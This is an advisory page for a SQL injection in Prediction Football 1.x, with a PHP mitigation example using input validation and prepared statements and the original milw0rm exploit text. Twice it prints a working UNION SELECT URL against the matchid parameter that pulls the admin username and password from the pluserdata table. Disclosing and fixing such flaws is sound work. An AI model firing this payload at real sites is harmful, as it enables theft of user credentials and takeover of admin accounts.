Vendor: Prediction Football
Discovered by: 0in from Dark-Coders Programming & Security Group
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Prediction Football
Affected Version From: 1.x
Affected Version To: 1.x
Patch Exists: NO
Related CWE: N/A
CPE: a:predictionfootball:prediction_football
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Web Server with support for PHP4.0 or greater, MySQL database
Published: 2008

Prediction Football v 1.x Remote SQL INJECTION

Prediction Football is a PHP/MySQL application that provides a web-based administration interface and automated prediction leagues. It supports multiple languages, lets users submit predictions simultaneously, lets users message each other, and allows several fixtures to be created at once. It requires a web server with PHP 4.0 or later and a MySQL database, and it is easy to download, install and run. The matchid parameter of showpredictionsformatch.php is placed into a SQL query without sanitisation, so a remote attacker can append a UNION SELECT to it and read rows from the pluserdata table. The published request is http://target.domain/[path]/showpredictionsformatch.php?sid=dupa&matchid=-666/**/union/**/select/**/1,2,3,concat(0x757365723a,username),concat(0x7061737377643a,password),6,7/**/from/**/pluserdata/**/WHERE/**/userid=1/* (the /**/ sequences stand in for spaces); it returns the username and password of the account with userid=1, which is the admin user.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries. For this issue that means rejecting any matchid value that is not a positive integer and passing the value to the database as a bound parameter of a prepared statement rather than concatenating it into the query string; a value such as -666/**/union/**/select... then never reaches the SQL parser.
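The following is an added example of that mitigation, written for this page; it is not code from Prediction Football. The table and column names (matches, home, away) are assumptions, and the data is constructed in an in-memory SQLite database so the script runs without a MySQL server. The matchid value is validated as a positive integer and then bound as a parameter, so the injected string from the advisory is rejected before any query is built.

```php
<?php
// Added example (not Prediction Football's own code): validating and
// parameterising the matchid parameter that the advisory above shows
// being injected. Table/column names are assumptions; the data is
// constructed in an in-memory SQLite database for a self-contained run.
declare(strict_types=1);

/**
 * A match id is a positive integer and nothing else. Returns null for any
 * other input so the caller can answer with an error instead of querying.
 * The vulnerable pattern this replaces is, in effect:
 *   "SELECT ... WHERE matchid = " . $_GET['matchid']
 * which lets "-666/**/union/**/select ..." become part of the statement.
 */
function parseMatchId(?string $raw): ?int
{
    if ($raw === null) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/**
 * Hardened query: the id travels as a bound integer parameter, so even a
 * value that slipped past validation could not change the SQL structure.
 */
function fetchMatch(PDO $db, int $matchId): ?array
{
    $stmt = $db->prepare('SELECT home, away FROM matches WHERE matchid = ?');
    $stmt->bindValue(1, $matchId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// --- Demonstration with constructed data ------------------------------
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE matches (matchid INTEGER PRIMARY KEY, home TEXT, away TEXT)');
$db->exec("INSERT INTO matches VALUES (1, 'Home FC', 'Away United')");

// Two sample inputs: a legitimate id and the shape of the injected value
// from the advisory (comment-for-space obfuscation, negative id, UNION).
$inputs = ['1', '-666/**/union/**/select/**/1,2'];

foreach ($inputs as $input) {
    $id = parseMatchId($input);
    if ($id === null) {
        echo 'rejected: ' . $input . PHP_EOL;
        continue;
    }
    $row = fetchMatch($db, $id);
    if ($row === null) {
        echo 'no match ' . $id . PHP_EOL;
    } else {
        echo 'match ' . $id . ': ' . $row['home'] . ' v ' . $row['away'] . PHP_EOL;
    }
}
```

Run with `php example.php`; the first input prints the match row and the second is rejected by parseMatchId without touching the database. In the real application the same two functions would replace the direct use of $_GET['matchid'] in showpredictionsformatch.php, with the PDO connection pointing at MySQL instead of SQLite.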

Exploit-DB raw data:

/*

                                       Prediction Football v 1.x Remote SQL INJECTION

Discovered by 0in from Dark-Coders Programming & Security Group.

!!!!!! > http://dark-coders.4rh.eu < !!!!!!

Contact: 0in(dot)email(at)gmail(dot)com

Greetz to all Dark-Coders Group Members: Die_Angel, Sun8hclf, M4r1usz, Djlinux, Aristo89

Script homepage: http://www.predictionfootball.com/

Description:  Prediction Football is a program that provides a web based administration 
config and automated prediction leagues. This program supports multiple languages. This 
script makes predictions simultaneously. This helps you to message other users and capable 
of multiple fixture creation. This requires web server with support for PHP4.0 or greater, 
MySQL database. Very easy to download and install the program and execute.

*/

Exploit:

http://target.domain/[path]/showpredictionsformatch.php?sid=dupa&matchid=-666/**/union/**/select/**/1,2,3,concat(0x757365723a,username),concat(0x7061737377643a,password),6,7/**/from/**/pluserdata/**/WHERE/**/userid=1/*  

userid=1 - the admin user has that userid; you can change it to another user.

//EoFF

# milw0rm.com [2008-04-08]